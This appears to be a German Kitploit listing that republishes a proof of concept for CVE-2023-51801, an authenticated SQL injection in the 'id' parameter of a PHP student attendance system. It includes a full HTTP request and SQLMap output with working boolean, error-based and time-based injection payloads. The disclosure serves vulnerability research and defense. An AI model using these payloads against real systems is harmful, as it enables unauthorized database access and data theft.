Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-51801 — Einfaches Studenten-Anwesenheitssystem v.1.0 - Mehrere SQL-Injection-Schwachstellen - student_form.php und class_form.php | Kitploit
Tools/GitHubGitHub/geraldoalcantara/cve-2023-51801
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubgeraldoalcantara/cve-2023-51801

CVE-2023-51801

Einfaches Studenten-Anwesenheitssystem v.1.0 - Mehrere SQL-Injection-Schwachstellen - student_form.php und class_form.php

Repository anzeigen
11vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-51801

Simple Student Attendance System v.1.0 - Mehrere SQL-Injection-Schwachstellen - student_form.php und class_form.php

Beschreibung: Das Simple Student Attendance System v.1.0 ist anfällig für mehrere SQL-Injection-Schwachstellen, die von authentifizierten Angreifern ausgenutzt werden können. Diese Schwachstellen existieren in student_form.php und class_form.php und ermöglichen die Ausführung beliebiger SQL-Befehle über den Parameter 'id'.

Betroffene Produktversion: Simple Student Attendance System v.1.0
CVE-Autor: Geraldo Alcântara
Datum: 29.11.2023
Bestätigt am: 10.01.2024
CVE: CVE-2023-51801
CVE-Link: https://www.cve.org/CVERecord?id=CVE-2023-51801
NVD-Link: https://nvd.nist.gov/vuln/detail/CVE-2023-51801
Tenable-Link: https://www.tenable.com/cve/CVE-2023-51801
Getestet auf: Windows

Schritte zur Reproduktion:

Um diese Schwachstelle auszunutzen, muss ein Angreifer zu den Seiten 'Student' oder 'Klassen' navigieren, wo er einen Schüler oder eine Klasse bearbeiten oder hinzufügen kann. Der schädliche Payload sollte dann in den Parameter 'id' eingefügt werden. :

Betroffene Komponente

Komponenten: student_form.php und class_form.php Parameter: id

Request:

root@kitploit:~
POST /php-attendance/modals/class_form.php HTTP/1.1
Host: 192.168.68.182
Cookie: PHPSESSID=emhqgom5shgrtcii7p3a8ad1bo
Content-Length: 4
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://192.168.68.182
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://192.168.68.182/php-attendance/?page=class_list
Accept-Encoding: gzip, deflate, br
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Priority: u=1, i
Connection: close

id=1'

SQLMap

root@kitploit:~
Parameter: id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1''' AND 4206=4206-- KDFY

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1''' OR (SELECT 1707 FROM(SELECT COUNT(*),CONCAT(0x716a6a7071,(SELECT (ELT(1707=1707,1))),0x717a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- xsae

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1''' AND (SELECT 1288 FROM (SELECT(SLEEP(5)))SVhp)-- EYkh

Entdecker/Quellenangaben:
Geraldo Alcântara

Tool herunterladen